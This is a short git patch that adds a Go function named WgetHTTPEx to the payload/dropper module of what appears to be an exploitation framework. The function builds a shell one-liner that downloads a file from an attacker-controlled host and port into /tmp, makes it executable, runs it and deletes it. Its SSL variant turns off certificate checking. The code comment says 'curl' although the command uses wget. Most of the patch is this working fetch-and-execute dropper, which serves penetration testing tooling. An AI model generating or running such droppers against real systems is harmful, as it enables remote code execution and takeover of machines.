From b7f42a19d44597571781a54887a10466ce8f9166 Mon Sep 17 00:00:00 2001
From: j-shomo <jshomo@vulncheck.com>
Date: Thu, 6 Nov 2025 15:57:44 -0500
Subject: [PATCH] add wget dropper execute payload

---
 payload/dropper/unix.go | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/payload/dropper/unix.go b/payload/dropper/unix.go
index aa70f3b..8e0a8b6 100644
--- a/payload/dropper/unix.go
+++ b/payload/dropper/unix.go
@@ -44,6 +44,19 @@ func (unix *UnixPayload) EitherHTTP(lhost string, lport int, ssl bool, downloadF
 		output, uri, output, uri, output, output, output)
 }
 
+// Download a remote file with curl, execute it, and delete it.
+func (unix *UnixPayload) WgetHTTPEx(lhost string, lport int, ssl bool, downloadFile string) string {
+	output := "/tmp/" + random.RandLetters(3)
+
+	if ssl {
+		return fmt.Sprintf("wget --no-check-certificate -O %s https://%s:%d/%s && chmod +x %s && %s & rm -f %s",
+			output, lhost, lport, downloadFile, output, output, output)
+	}
+
+	return fmt.Sprintf("wget -O %s http://%s:%d/%s && chmod +x %s && %s & rm -f %s",
+		output, lhost, lport, downloadFile, output, output, output)
+}
+
 // Download a remote bash script with wget and pipe it to bash.
 func (unix *UnixPayload) WgetHTTP(lhost string, lport int, ssl bool, downloadFile string) string {
 	uri := fmt.Sprintf("%s:%d/%s", lhost, lport, downloadFile)